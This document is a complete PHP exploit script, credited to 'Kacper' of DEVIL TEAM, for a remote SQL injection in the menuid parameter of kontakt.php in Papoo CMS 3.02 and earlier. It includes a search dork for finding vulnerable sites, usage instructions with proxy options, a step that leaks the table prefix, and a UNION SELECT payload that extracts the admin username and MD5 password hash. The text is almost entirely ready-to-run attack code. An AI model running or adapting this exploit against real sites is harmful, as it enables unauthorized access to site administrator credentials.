Papoo 3.02 (kontakt menuid) Remote SQL Injection Exploit

<? /* Autor:&nbsp;Kacper Contact:&nbsp;kacper1964@yahoo.pl Homepage:&nbsp;http://www.rahim.webd.pl/ Irc:&nbsp;irc.milw0rm.com:6667&nbsp;#devilteam&nbsp; Pozdro&nbsp;dla&nbsp;wszystkich&nbsp;z&nbsp;kanalu&nbsp;IRC&nbsp;oraz&nbsp;forum&nbsp;DEVIL&nbsp;TEAM. //dork:&nbsp;\\\"Help&nbsp;*&nbsp;Contact&nbsp;*&nbsp;Imprint&nbsp;*&nbsp;Sitemap\\\"&nbsp;|&nbsp;\\\"powered&nbsp;by&nbsp;papoo\\\"&nbsp;|&nbsp;\\\"powered&nbsp;by&nbsp;cms&nbsp;papoo\\\" Papoo&nbsp;<=&nbsp;3.02&nbsp;(kontakt&nbsp;menuid)&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Exploit script&nbsp;homepage/download/demo:&nbsp;http://www.papoo.de/ */ if&nbsp;($argc<4)&nbsp;{ print_r(\\\' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Usage:&nbsp;php&nbsp;\\\'.$argv[0].\\\'&nbsp;host&nbsp;path&nbsp;userid&nbsp;OPTIONS host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname) path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;papoo&nbsp;path userid:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;ID Options: &nbsp;-X[prefix]:&nbsp;&nbsp;PAPOO&nbsp;database&nbsp;columns&nbsp;prefix &nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80 &nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy Example: php&nbsp;\\\'.$argv[0].\\\'&nbsp;127.0.0.1&nbsp;/papoo/&nbsp;10 php&nbsp;\\\'.$argv[0].\\\'&nbsp;127.0.0.1&nbsp;/papoo/&nbsp;10&nbsp;-Xpapoo php&nbsp;\\\'.$argv[0].\\\'&nbsp;127.0.0.1&nbsp;/papoo/&nbsp;10&nbsp;-P1.1.1.1:80 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \\\'); die; } error_reporting(7); ini_set(\\\"max_execution_time\\\",0); ini_set(\\\"default_socket_timeout\\\",5); function&nbsp;quick_dump($string) { &nbsp;&nbsp;$result=\\\'\\\';$exa=\\\'\\\';$cont=0; &nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;)) &nbsp;&nbsp;&nbsp;{$result.=\\\"&nbsp;&nbsp;.\\\";} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$result.=\\\"&nbsp;&nbsp;\\\".$string[$i];} &nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2) &nbsp;&nbsp;&nbsp;{$exa.=\\\"&nbsp;\\\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$exa.=\\\"&nbsp;0\\\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\\\"\\\\r\\\\n\\\";&nbsp;$exa.=\\\"\\\\r\\\\n\\\";} &nbsp;&nbsp;} &nbsp;return&nbsp;$exa.\\\"\\\\r\\\\n\\\".$result; } $proxy_regex&nbsp;=&nbsp;\\\'(\\\\b\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\:\\\\d{1,5}\\\\b)\\\'; function&nbsp;wyslijpakiet($packet) { &nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex; &nbsp;&nbsp;if&nbsp;($proxy==\\\'\\\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\'No&nbsp;response&nbsp;from&nbsp;\\\'.$host.\\\':\\\'.$port;&nbsp;die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ $c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\\\';die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\\\':\\\',$proxy); &nbsp;&nbsp;&nbsp;&nbsp;$parts[1]=(int)$parts[1]; &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\"Connecting&nbsp;to&nbsp;\\\".$parts[0].\\\":\\\".$parts[1].\\\"&nbsp;proxy...\\\\r\\\\n\\\"; &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\'No&nbsp;response&nbsp;from&nbsp;proxy...\\\';die; } &nbsp;&nbsp;} &nbsp;&nbsp;fputs($ock,$packet); &nbsp;&nbsp;if&nbsp;($proxy==\\\'\\\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\\\'\\\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\\\'\\\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;fclose($ock); } $host=$argv[1]; $path=$argv[2]; $userid=$argv[3]; $port=80; $proxy=\\\"\\\"; for&nbsp;($i=4;&nbsp;$i<$argc;&nbsp;$i++){ $temp=$argv[$i][0].$argv[$i][1]; if&nbsp;($temp==\\\"-p\\\") { &nbsp;&nbsp;$port=(int)str_replace(\\\"-p\\\",\\\"\\\",$argv[$i]); } if&nbsp;($temp==\\\"-P\\\") { &nbsp;&nbsp;$proxy=str_replace(\\\"-P\\\",\\\"\\\",$argv[$i]); } if&nbsp;($temp==\\\"-X\\\") { &nbsp;&nbsp;$prefix=str_replace(\\\"-X\\\",\\\"\\\",$argv[$i]); } } if&nbsp;(($path[0]<>\\\'/\\\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\\\'/\\\'))&nbsp;{die(\\\"Bad&nbsp;path!\\\");} if&nbsp;($proxy==\\\'\\\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\\\'http://\\\'.$host.\\\':\\\'.$port.$path;} function&nbsp;sprawdz($hash) { &nbsp;if&nbsp;(ereg(\\\"^[a-f0-9]{32}\\\",trim($hash)))&nbsp;{return&nbsp;true;} &nbsp;else&nbsp;{return&nbsp;false;} } function&nbsp;char_convert($my_string) { &nbsp;&nbsp;$encoded=\\\"CHAR(\\\"; &nbsp;&nbsp;for&nbsp;($k=0;&nbsp;$k<=strlen($my_string)-1;&nbsp;$k++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$encoded.=ord($my_string[$k]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($k==strlen($my_string)-1)&nbsp;{$encoded.=\\\")\\\";} &nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{$encoded.=\\\",\\\";} &nbsp;&nbsp;} &nbsp;&nbsp;return&nbsp;$encoded; } if&nbsp;(isset($prefix))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\"Prefix:&nbsp;\\\".$prefix.\\\"\\\\r\\\\n\\\"; } if&nbsp;($prefix==\\\"\\\") { &nbsp;&nbsp;$packet=\\\"GET&nbsp;\\\".$p.\\\"kontakt.php?menuid=-1)+&nbsp;HTTP/1.0\\\\r\\\\n\\\"; &nbsp;&nbsp;$packet.=\\\"Host:&nbsp;\\\".$host.\\\"\\\\r\\\\n\\\"; &nbsp;&nbsp;$packet.=\\\"Connection:&nbsp;Close\\\\r\\\\n\\\\r\\\\n\\\"; &nbsp;&nbsp;wyslijpakiet($packet); &nbsp;&nbsp;if&nbsp;(strstr($html,\\\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\\\")) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\\\"_papoo_collum3\\\",$html); &nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\\\"SELECT&nbsp;article&nbsp;FROM&nbsp;\\\",$temp[0]); &nbsp;&nbsp;&nbsp;&nbsp;$prefix=$temp2[count($temp2)-1]; &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\\\"prefix:&nbsp;\\\".$prefix.\\\"\\\\n\\\"; &nbsp;&nbsp;} &nbsp;&nbsp;else &nbsp;&nbsp;{die(\\\"Unable&nbsp;to&nbsp;disclose&nbsp;table&nbsp;prefix...\\\\n\\\");} } print&nbsp;\\\"Papoo&nbsp;<=&nbsp;3.02&nbsp;(kontakt&nbsp;menuid)&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper\\\\r\\\\n\\\"; $packet&nbsp;=\\\"GET&nbsp;\\\".$p.\\\"kontakt.php?menuid=-1)+union+select+CONCAT(\\\".char_convert(\\\"<!--[#\\\").\\\",username,CHAR(58),password,\\\".char_convert(\\\"#]-->\\\").\\\")+from+\\\".$prefix.\\\"_papoo_user+WHERE+userid=\\\".$userid.\\\"/*&nbsp;HTTP/1.0\\\\r\\\\n\\\"; $packet.=\\\"Referer:&nbsp;http://\\\".$host.$path.\\\"kontakt.php\\\\r\\\\n\\\"; $packet.=\\\"Accept-Language:&nbsp;pl\\\\r\\\\n\\\"; $packet.=\\\"Content-Type:&nbsp;application/x-www-form-urlencoded\\\\r\\\\n\\\"; $packet.=\\\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)\\\\r\\\\n\\\"; $packet.=\\\"Host:&nbsp;\\\".$host.\\\"\\\\r\\\\n\\\"; $packet.=\\\"Connection:&nbsp;Close\\\\r\\\\n\\\\r\\\\n\\\"; wyslijpakiet($packet); sleep(3); $temp=explode(\\\'<!--[#\\\',$html); $temp2=explode(\\\'#]-->\\\',$temp[1]); for&nbsp;($i=1;&nbsp;$i<=count($temp)-1;&nbsp;$i++) { &nbsp;$temp2=explode(\\\":\\\",$temp[$i]); &nbsp;if&nbsp;(sprawdz($temp2[1])) &nbsp;{ &nbsp;&nbsp;echo&nbsp;\\\"admin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\\\".$temp2[0].\\\"\\\\n\\\"; &nbsp;&nbsp;echo&nbsp;\\\"password&nbsp;(md5)&nbsp;=>&nbsp;\\\".$temp2[1].\\\"\\\\n\\\"; &nbsp;&nbsp;die; &nbsp;} } echo&nbsp;\\\"Script&nbsp;is&nbsp;not&nbsp;vulnerability&nbsp;;(\\\\r\\\\n\\\"; ?>